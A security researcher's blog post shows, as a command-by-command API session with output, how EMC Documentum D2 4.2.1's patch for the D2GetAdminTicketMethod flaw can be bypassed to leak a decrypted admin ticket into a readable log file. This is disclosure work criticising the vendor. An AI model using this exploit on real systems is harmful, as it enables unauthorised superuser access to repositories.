Is it worth to treat flu if patient has cancer?

Here I described vulnerability in D2GetAdminTicketMethod docbase method, after that EMC released D2 4.2 where they have started encrypting return values passed through c6_method_return object, but their solution was still vulnerable, now in D2 4.2.1 they made a decision to treat snots instead of increasing technology level of D2. Note, that security advisory is still not published:

that according to the statements provided above means that EMC does not “want to inform customers about a new or updated recommendation on security best practices”.

Fortunately, EMC coders neither know the product they are trying to develop, nor read documentation. Follow my hands:

API> create,c,c6_method_return
...
000224838000011f
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod,
     ARGUMENTS,S,'
       -docbase_name d2 
       -password "" 
       -method_return_id 000224838000011f 
       -scope global 
       -timeout 3600
     '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> revert,c,000224838000011f
...
OK
API> get,c,000224838000011f,message
...
AAAAEFRN36mfm+NAm49DQAZol1fSBbIgoELusFMnk4eE6r3qNPm/83NDxqiFyoe7Yt/GOjASn6v2
v2XjSaJq5MqGK8PgrNPbNz5KSAzxcKTWorJym/7ceZsp9l5pSUcDr1mj8xKg0M/iH8AIS8ZGZ9/L
2bd1FOth86ISN2OnAIOAlzh32I0/YcLYt7nSSfFWDL9H9qzzkp6Za/NeZt4Z0kE1gYNPaVrlPD4D
qC4bcSb3p54VeAZCVOgpUp3sJ+8kevoRQSKckOTSinBYF4qQa9pnNYQx8wczFk2/pM0pkCdDigyT
uOluf/e5kmAui7LLr7LkeBYiKBXaJg72sDT2pKjWi6byYIQ/fim57QrxXR608Pw0meiADtHQXARF
c9PtRvavRM7+m1HrfcRAML7qFUJCrIjDhEf/MTA95ZPYM3tdp2aEcq0EspD4Cn//iwVW9DK5Vt5c
AmtGRUfA0rHB6UvGhWbH5hQb9itZCP3lMDEjBr2B/3jbBC+CuMvK049j1rBxV5h1XJGhjJ+oMJWg
kmvFAjoZJNuqUWCqWLHn+WyO5I5DA54qUtw/SERO1srCPP6jYuE2Ym6WaVRXDhzZCjQLz+fbciba
qSbTFdeXQFZAO2s24mKx3tetyAp9nS04pAfTyFlLsMN83LRIGCUwij3BrfTY4X9wq4WqQiAT3a8M
jHrCXpd/5tWLMVPm/0jSSgj/SMtzU4bVBHKoIFclzLq+ciIsy9hVKdV8dQBfWzt3brQqGv8H2TvR
VlTxwTJWLZ/chujhwmWBN/28tXzK6EhLs5mSVaJ/SI7A4VhEq3qtileKaSULKSZiZ4sIT2nFAG7r
vBDGiEGQ/iG7jITFWYq4boou305kfYuPqM1U0E1qo8UQ

API> ?,c,update c6_method_return object 
     set parameter_name[0]='-timeout', 
     set parameter_value[0]=(select message from c6_method_return 
        where r_object_id='000224838000011f') 
     where r_object_id='000224838000011f'
objects_updated
---------------
              1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."


API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod,
     ARGUMENTS,S,'
        -docbase_name d2 
        -password "" 
        -method_return_id 000224838000011f 
        -scope global -timeout 3600
     ',
     SAVE_RESULTS,B,T
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0902248380002a67
  result_doc_id                   : 0902248380002a67
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> get,c,000224838000011f,message
...
AAAAEBBMjU2FE27RAOiKSkZdJZM7tl1ht+LhqjvPsmr9DPg3nVgGFyROrETPX6Wy8uuEWbtKSWs3
MNr8qe3EBNTejbieKZ2YzzUY/46fLdbOQFInczwrNCBoWF9zBnTlhoHK1f+ctpm9nUsK2wJbDZXb
mk6+1VO5RsUEuFV/qux5LBdXpIr7dRornpDJiBP5hoPILObq4++KvBfhZjaPxEnoOMksfwgmU8XC
oTady3QQNIpgnFdwKf6dOzSbmj3tsyycqul+YZ9Dqeq8dq532RW7/9l2uS/v8AoXsFeegyCada5m
KMh1gjtnkntIjk/i+sZoz1l8ilyNQs8d5dc5aIbvDCMWaxJgaUMOnPSVogj+d8poAoLfesOsuiCA
+0zkRrMBDuInW1gCAgNMHdKPaoO3nU1UgooLuV++w+OXawTyoP+oaVR7K4/q4Yy7AmH+r2LRZdT6
EELz2aJ/R7ao+OEUJQvuilxFcsQBJ4iIN5WzDCqzp9xa4wUtPkxmYXcuZmh+R5fHLo8OGop8lU38
NcnB7uGIBf9hdDfK92Ac3m/snRc2W4RE4pknixFIMumpqShMzkjBLZrPVYbf93E8b7LghlxCZ+6C
XM/HGowQd2ZILSn7HnKW7dWk+w8OJBl8n8cmgmIrxsjo0XJRKFy930MqREaAqZaMwbSfs0st6q4Y
EKki2b9HPicRPSTzmpXEnLrxe85taV3If5mLQelbeJcSoMNBpl7nC0FIcr4N1QHaTKtaRzeuUZQI
kmE8osy7RfiR9vuTWM6WoqpLt/eZCzancyS7tg6sjfp2eOFORCiSQ7loWaxLRDcze6rY+Ceb1LB2
RCZoV0CVzEz64lf7EC6SPPEGTi27QRZt4hnu/2w64YyN
API> get,c,000224838000011f,error
...

API> getpath,c,0902248380002a67
...
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/09/e1.txt
API> quit
Bye
 ~]$ cat content_storage_01/00022483/80/00/09/e1.txt
==== START =======================================================
D2-API v4.2.0010 build 378
DFC version : 7.1.0020.0120
file.encoding : UTF-8
Arguments : {-docbase_name=d2, 
    -method_return_id=000224838000011f, 
    -password=, 
    -class_name=com.emc.d2.api.methods.D2GetAdminTicketMethod, 
    -scope=global,
    -timeout=DM_TICKET=T0JKIE5VTEwgMAoxMwp....
}
-Scope : global
-TimeOut : 3600
D2Method.passphrase MD5 : default
-SingleUse : true
D2Method.passphrase MD5 : default
==== END (0.095s) ================================================

It’s already second try to fix D2GetAdminTicketMethod vulnerability, and fix is still incomplete and wrong, what a shame, EMC can’t fix high-severity vulnerability within already 5 months.

3 thoughts on “Is it worth to treat flu if patient has cancer?

  1. Pingback: CVE-2014-2515 (D2GetAdminTicketMethod). Was it really fixed? | Documentum in a (nuts)HELL
  2. Pingback: Is it possible to compromise Documentum by deleting object? Typical mistakes | Documentum in a (nuts)HELL
  3. Pingback: Say goodbuy LockBox. Part II | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s